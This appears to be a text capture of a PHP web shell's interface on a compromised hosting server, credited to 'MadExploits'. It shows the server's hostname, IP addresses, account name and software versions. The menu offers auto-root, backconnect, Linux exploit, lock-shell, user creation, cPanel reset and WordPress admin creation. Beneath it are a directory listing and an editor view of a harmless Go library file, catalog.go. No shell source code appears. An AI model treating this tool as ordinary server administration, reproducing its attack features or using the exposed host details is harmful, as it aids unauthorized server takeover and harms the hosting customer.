Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.184
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
golang.org /
x /
text@v0.14.0 /
message /
[ HOME SHELL ]
Name
Size
Permission
Action
catalog
[ DIR ]
dr-xr-xr-x
pipeline
[ DIR ]
dr-xr-xr-x
catalog.go
1.13
KB
-r--r--r--
catalog_test.go
1.03
KB
-r--r--r--
doc.go
3.49
KB
-r--r--r--
examples_test.go
2.05
KB
-r--r--r--
fmt_test.go
57.87
KB
-r--r--r--
format.go
11.97
KB
-r--r--r--
message.go
4.59
KB
-r--r--r--
message_test.go
5.49
KB
-r--r--r--
print.go
23.24
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : catalog.go
// Copyright 2015 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package message // TODO: some types in this file will need to be made public at some time. // Documentation and method names will reflect this by using the exported name. import ( "golang.org/x/text/language" "golang.org/x/text/message/catalog" ) // MatchLanguage reports the matched tag obtained from language.MatchStrings for // the Matcher of the DefaultCatalog. func MatchLanguage(preferred ...string) language.Tag { c := DefaultCatalog tag, _ := language.MatchStrings(c.Matcher(), preferred...) return tag } // DefaultCatalog is used by SetString. var DefaultCatalog catalog.Catalog = defaultCatalog var defaultCatalog = catalog.NewBuilder() // SetString calls SetString on the initial default Catalog. func SetString(tag language.Tag, key string, msg string) error { return defaultCatalog.SetString(tag, key, msg) } // Set calls Set on the initial default Catalog. func Set(tag language.Tag, key string, msg ...catalog.Message) error { return defaultCatalog.Set(tag, key, msg...) }
Close